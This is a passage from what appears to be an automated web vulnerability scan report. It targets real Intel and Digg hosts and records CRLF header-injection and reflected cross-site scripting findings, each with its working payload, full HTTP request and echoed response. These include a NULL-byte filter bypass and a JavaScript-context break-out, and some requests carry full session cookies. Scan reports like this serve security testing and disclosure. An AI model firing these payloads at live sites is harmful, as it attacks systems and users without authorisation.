3.7. http://rss.intel.com/click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f9a1a%0d%0a9f2d1231440 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-258152-c1-264093f9a1a%0d%0a9f2d1231440/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:18 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093f9a1a
9f2d1231440

Content-Length: 217
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093f9a1a
9f2d1
...[SNIP]...

3.8. http://rss.intel.com/click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264102/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d2807%0d%0af84a0e66e75 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-258152-c1-264102d2807%0d%0af84a0e66e75/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:19 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102d2807
f84a0e66e75

Content-Length: 207
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-identifies-chipset-design-error-implementing-solution?cid=rss-258152-c1-264102d2807
f84a0e66e75">he
...[SNIP]...

3.9. http://rss.intel.com/click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-258152-c1-264131/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7044c%0d%0ad07dd0e1f41 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /click/~rss-258152-c1-2641317044c%0d%0ad07dd0e1f41/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 06 Feb 2011 01:56:19 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-2641317044c
d07dd0e1f41

Content-Length: 225
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-2641317044
...[SNIP]...

4. Cross-site scripting (reflected)
There are 99 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ddf0f"><script>alert(1)</script>ae77e5693f was submitted in the REST URL parameter 1. This input was echoed as ddf0f"><script>alert(1)</script>ae77e5693f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00ddf0f"><script>alert(1)</script>ae77e5693f?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:48 GMT; path=/; domain=digg.com
Set-Cookie: d=a6fbe359887d5db537b9b4c69ceaa445e8d94eb57157cfe93fc4c3a5ea808a45; expires=Fri, 05-Feb-2021 09:25:28 GMT; path=/; domain=.digg.com
X-Digg-Time: D=186622 10.2.128.255
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5819

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00ddf0f"><script>alert(1)</script>ae77e5693f?url=.rss">
...[SNIP]...

4.2. http://inside.intel.com/LOPFeedMashup [SN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPFeedMashup

Issue detail

The value of the SN request parameter is copied into the HTML document as plain text between tags. The payload ef091<script>alert(1)</script>3dacfb292a3 was submitted in the SN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LOPFeedMashup?ON=runMashup&SN=LOPMASHUP09ef091<script>alert(1)</script>3dacfb292a3&STARTINDEX=1&COUNT=3 HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947643351; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.2.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=369978 t=1296947581195723
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43158
Expires: Sun, 06 Feb 2011 11:13:31 GMT
Date: Sat, 05 Feb 2011 23:14:13 GMT
Connection: close
Content-Length: 311

Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP09ef091<script>alert(1)</script>3dacfb292a3 - Unable to find resource (LOPMASHUP09ef091<script>
...[SNIP]...

4.3. http://inside.intel.com/LOPSPFeedMashup [SN1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPSPFeedMashup

Issue detail

The value of the SN1 request parameter is copied into the HTML document as plain text between tags. The payload 1d7b9<script>alert(1)</script>6803e5c75c1 was submitted in the SN1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LOPSPFeedMashup?ON=runMashup&SN1=LOPMASHUP111d7b9<script>alert(1)</script>6803e5c75c1&SN2=LOPMASHUP07A&SN3=LOPMASHUP07B&SN4=LOPMASHUP07C&STARTINDEX=1&COUNT=10&SIP=keyword= HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947561739; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=%5B%5BB%5D%5D; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=378739 t=1296948033239822
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43141
Expires: Sun, 06 Feb 2011 11:20:47 GMT
Date: Sat, 05 Feb 2011 23:21:46 GMT
Connection: close
Content-Length: 311

Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP111d7b9<script>alert(1)</script>6803e5c75c1 - Unable to find resource (LOPMASHUP111d7b9<script>
...[SNIP]...

4.4. http://inside.intel.com/LOPSPFeedMashup [SN2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPSPFeedMashup

Issue detail

The value of the SN2 request parameter is copied into the HTML document as plain text between tags. The payload 85e7a<script>alert(1)</script>3d9a1e6322b was submitted in the SN2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LOPSPFeedMashup?ON=runMashup&SN1=LOPMASHUP11&SN2=LOPMASHUP07A85e7a<script>alert(1)</script>3d9a1e6322b&SN3=LOPMASHUP07B&SN4=LOPMASHUP07C&STARTINDEX=1&COUNT=10&SIP=keyword= HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947561739; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=%5B%5BB%5D%5D; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=385035 t=1296948034236978
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43200
Expires: Sun, 06 Feb 2011 11:21:47 GMT
Date: Sat, 05 Feb 2011 23:21:47 GMT
Connection: close
Content-Length: 313

Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP07A85e7a<script>alert(1)</script>3d9a1e6322b - Unable to find resource (LOPMASHUP07A85e7a<script>
...[SNIP]...

4.5. http://inside.intel.com/LOPSPFeedMashup [SN3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPSPFeedMashup

Issue detail

The value of the SN3 request parameter is copied into the HTML document as plain text between tags. The payload 74c09<script>alert(1)</script>e0e02b85dc5 was submitted in the SN3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LOPSPFeedMashup?ON=runMashup&SN1=LOPMASHUP11&SN2=LOPMASHUP07A&SN3=LOPMASHUP07B74c09<script>alert(1)</script>e0e02b85dc5&SN4=LOPMASHUP07C&STARTINDEX=1&COUNT=10&SIP=keyword= HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947561739; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=%5B%5BB%5D%5D; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=412655 t=1296948035565396
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43200
Expires: Sun, 06 Feb 2011 11:21:48 GMT
Date: Sat, 05 Feb 2011 23:21:48 GMT
Connection: close
Content-Length: 313

Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP07B74c09<script>alert(1)</script>e0e02b85dc5 - Unable to find resource (LOPMASHUP07B74c09<script>
...[SNIP]...

4.6. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://itcenter.intel.com
Path:   /ResourceLibrary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b801'><script>alert(1)</script>7e58a74ceab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ResourceLibrary?4b801'><script>alert(1)</script>7e58a74ceab=1 HTTP/1.1
Host: itcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:22:43 GMT
Connection: close
Content-Length: 71611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
<head><met
...[SNIP]...
<a href='http://itcenter.intel.com/ResourceLibrary?4b801'><script>alert(1)</script>7e58a74ceab=1&amp;offset=0' class='single'>
...[SNIP]...

4.7. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://itcenter.intel.com
Path:   /ResourceLibrary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76eab"><script>alert(1)</script>9b7cdc81c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ResourceLibrary?76eab"><script>alert(1)</script>9b7cdc81c1f=1 HTTP/1.1
Host: itcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:22:38 GMT
Connection: close
Content-Length: 71611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
<head><met
...[SNIP]...
<a class="filter" href="http://itcenter.intel.com/ResourceLibrary?76eab"><script>alert(1)</script>9b7cdc81c1f=1&filters=removeAll&offset=0" fcat="itcenterlanguage" fval="en_US">
...[SNIP]...

4.8. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The value of the idPrefix request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83dbe'%3balert(1)//e4158e95dd8 was submitted in the idPrefix parameter. This input was echoed as 83dbe';alert(1)//e4158e95dd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwi83dbe'%3balert(1)//e4158e95dd8&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.3.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947627821; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; 
s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:14 GMT
Server: Apache
X-JAL: 419
Content-Language: en-US
CacheHit: D=421684 t=1296947654881565
X-JSL: D=421690 t=1296947654881565
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large">

<!-- Parameters that have to be defined before including this ftl-->
<!-- tagSets is a collection of TagSet-->
<!-- Specialize ContentFilterHandler if there is a
...[SNIP]...

$j(document).ready(function() {
// Parse the frameID out of the dom
var parsedFrameID = $j('#jive-recentcontent-content-block-container_7llQwi83dbe';alert(1)//e4158e95dd8').parent().parent().attr('id');
parsedFrameID = parsedFrameID.substring(parsedFrameID.lastIndexOf('_') + 1, parsedFrameID.length);
var pager = new jive.Pager.
...[SNIP]...

4.9. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The value of the idPrefix request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e736f%3balert(1)//c5ce5e171d4 was submitted in the idPrefix parameter. This input was echoed as e736f;alert(1)//c5ce5e171d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwie736f%3balert(1)//c5ce5e171d4&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
